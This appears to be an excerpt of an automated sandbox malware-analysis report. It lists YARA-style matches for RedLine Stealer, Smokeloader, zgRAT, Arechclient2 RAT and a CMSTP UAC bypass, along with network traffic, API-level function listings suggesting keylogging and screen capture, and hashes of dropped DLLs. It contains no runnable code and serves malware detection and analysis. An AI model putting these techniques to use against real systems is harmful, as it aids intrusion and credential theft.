                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                Source: unknownHTTPS traffic detected: 169.150.236.97:443 -> 192.168.2.4:49749 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49762 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006AC8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,2_2_006AC8B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C86A5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,2_2_6C86A5AA

                                System Summary

                                barindex
                                Source: 3.2.cmd.exe.5e100c8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                                Source: 2.2.run.exe.3a2fd5b.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 17.2.cmd.exe.5a000c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                                Source: 2.2.run.exe.3a2f15b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 17.2.cmd.exe.5427976.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 15.2.run.exe.3e5286d.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 3.2.cmd.exe.5472264.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 2.2.run.exe.39eb86d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 3.2.cmd.exe.5472e64.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 17.2.cmd.exe.5a000c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                                Source: 25.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                                Source: 17.2.cmd.exe.546b264.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 3.2.cmd.exe.5e100c8.8.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                                Source: 15.2.run.exe.3e96d5b.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 15.2.run.exe.3e9615b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 17.2.cmd.exe.546be64.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 3.2.cmd.exe.542e976.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                                Source: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                                Source: 00000001.00000002.2090299966.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: C:\Users\user\AppData\Local\Temp\cqecfsbe, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C02ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,1_2_6C02ED10
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C06B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6C06B700
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C06B8C0 rand_s,NtQueryVirtualMemory,1_2_6C06B8C0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C06B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,1_2_6C06B910
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C00F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6C00F280
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA662C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,1_2_6CA662C0
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_004278800_2_00427880
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0040B8AE0_2_0040B8AE
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0040C1910_2_0040C191
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_004051B40_2_004051B4
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_004123A00_2_004123A0
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0040F4410_2_0040F441
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0040C44C0_2_0040C44C
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0042140C0_2_0042140C
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0040BC200_2_0040BC20
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0041BE390_2_0041BE39
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0040BECA0_2_0040BECA
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_004087610_2_00408761
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0041B7220_2_0041B722
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0040C7FC0_2_0040C7FC
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0315BB150_2_0315BB15
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0315C3F80_2_0315C3F8
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0315CA630_2_0315CA63
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0315C1310_2_0315C131
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0316B9890_2_0316B989
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_031589C80_2_031589C8
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_031626070_2_03162607
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0315BE870_2_0315BE87
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0315C6B30_2_0315C6B3
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0315F6A80_2_0315F6A8
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0035A01_2_6C0035A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C07AC001_2_6C07AC00
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C045C101_2_6C045C10
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C052C101_2_6C052C10
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C07542B1_2_6C07542B
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0154401_2_6C015440
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C07545C1_2_6C07545C
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C016C801_2_6C016C80
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0634A01_2_6C0634A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C06C4A01_2_6C06C4A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0164C01_2_6C0164C0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C02D4D01_2_6C02D4D0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C00D4E01_2_6C00D4E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C046CF01_2_6C046CF0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C01FD001_2_6C01FD00
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0305121_2_6C030512
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C02ED101_2_6C02ED10
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C040DD01_2_6C040DD0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0685F01_2_6C0685F0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0556001_2_6C055600
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C047E101_2_6C047E10
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C069E301_2_6C069E30
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0246401_2_6C024640
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C052E4E1_2_6C052E4E
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C029E501_2_6C029E50
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C043E501_2_6C043E50
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C076E631_2_6C076E63
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C00C6701_2_6C00C670
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C06E6801_2_6C06E680
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C025E901_2_6C025E90
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C064EA01_2_6C064EA0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0776E31_2_6C0776E3
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C00BEF01_2_6C00BEF0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C01FEF01_2_6C01FEF0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C019F001_2_6C019F00
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0477101_2_6C047710
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0577A01_2_6C0577A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C00DFE01_2_6C00DFE0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C036FF01_2_6C036FF0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0178101_2_6C017810
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C04B8201_2_6C04B820
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0548201_2_6C054820
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0288501_2_6C028850
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C02D8501_2_6C02D850
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C04F0701_2_6C04F070
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0360A01_2_6C0360A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0750C71_2_6C0750C7
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C02C0E01_2_6C02C0E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0458E01_2_6C0458E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C02A9401_2_6C02A940
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C01D9601_2_6C01D960
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C05B9701_2_6C05B970
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C07B1701_2_6C07B170
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0451901_2_6C045190
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0629901_2_6C062990
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C00C9A01_2_6C00C9A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C03D9B01_2_6C03D9B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C049A601_2_6C049A60
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C07BA901_2_6C07BA90
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0022A01_2_6C0022A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C034AA01_2_6C034AA0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C01CAB01_2_6C01CAB0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C072AB01_2_6C072AB0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C048AC01_2_6C048AC0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C021AF01_2_6C021AF0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C04E2F01_2_6C04E2F0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C04D3201_2_6C04D320
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0053401_2_6C005340
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C01C3701_2_6C01C370
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C00F3801_2_6C00F380
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C0753C81_2_6C0753C8
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C93ECD01_2_6C93ECD0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8DECC01_2_6C8DECC0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9A6C001_2_6C9A6C00
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9BAC301_2_6C9BAC30
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8EAC601_2_6C8EAC60
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C976D901_2_6C976D90
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8E4DB01_2_6C8E4DB0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA6CDC01_2_6CA6CDC0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA68D201_2_6CA68D20
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9AED701_2_6C9AED70
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA0AD501_2_6CA0AD50
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C966E901_2_6C966E90
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8EAEC01_2_6C8EAEC0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C980EC01_2_6C980EC0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9C0E201_2_6C9C0E20
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C97EE701_2_6C97EE70
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA28FB01_2_6CA28FB0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8EEFB01_2_6C8EEFB0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9BEFF01_2_6C9BEFF0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8E0FE01_2_6C8E0FE0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA20F201_2_6CA20F20
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8E6F101_2_6C8E6F10
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C94EF401_2_6C94EF40
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9A2F701_2_6C9A2F70
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9E68E01_2_6C9E68E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9308201_2_6C930820
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C96A8201_2_6C96A820
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9B48401_2_6C9B4840
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9A09B01_2_6C9A09B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9709A01_2_6C9709A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C99A9A01_2_6C99A9A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9149F01_2_6C9149F0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9FC9E01_2_6C9FC9E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9369001_2_6C936900
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9189601_2_6C918960
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C95EA801_2_6C95EA80
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C98EA001_2_6C98EA00
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C998A301_2_6C998A30
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C95CA701_2_6C95CA70
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C980BA01_2_6C980BA0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9E6BE01_2_6C9E6BE0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA0A4801_2_6CA0A480
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9264D01_2_6C9264D0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C97A4D01_2_6C97A4D0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C96A4301_2_6C96A430
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9444201_2_6C944420
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8F84601_2_6C8F8460
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8D45B01_2_6C8D45B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C96E5F01_2_6C96E5F0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9AA5E01_2_6C9AA5E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9385401_2_6C938540
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9E45401_2_6C9E4540
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9805701_2_6C980570
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA285501_2_6CA28550
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9425601_2_6C942560
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9046D01_2_6C9046D0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C93E6E01_2_6C93E6E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C97E6E01_2_6C97E6E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C93C6501_2_6C93C650
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C90A7D01_2_6C90A7D0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9607001_2_6C960700
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8D80901_2_6C8D8090
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9BC0B01_2_6C9BC0B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8F00B01_2_6C8F00B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9A80101_2_6C9A8010
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9AC0001_2_6C9AC000
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C92E0701_2_6C92E070
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8E01E01_2_6C8E01E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9561301_2_6C956130
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9C41301_2_6C9C4130
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9481401_2_6C948140
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9AE2B01_2_6C9AE2B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9B22A01_2_6C9B22A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA662C01_2_6CA662C0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006940602_2_00694060
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006AF8402_2_006AF840
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006AB1502_2_006AB150
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006921202_2_00692120
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006B61302_2_006B6130
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006E9A002_2_006E9A00
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006DCAA02_2_006DCAA0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006A43902_2_006A4390
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006B03902_2_006B0390
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006BFC102_2_006BFC10
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_0069D5702_2_0069D570
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006E55502_2_006E5550
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006E96E02_2_006E96E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_0069A6F02_2_0069A6F0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006B66F02_2_006B66F0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006937B02_2_006937B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C944D8F2_2_6C944D8F
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C943D162_2_6C943D16
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C95371C2_2_6C95371C
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C8BD24D2_2_6C8BD24D
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
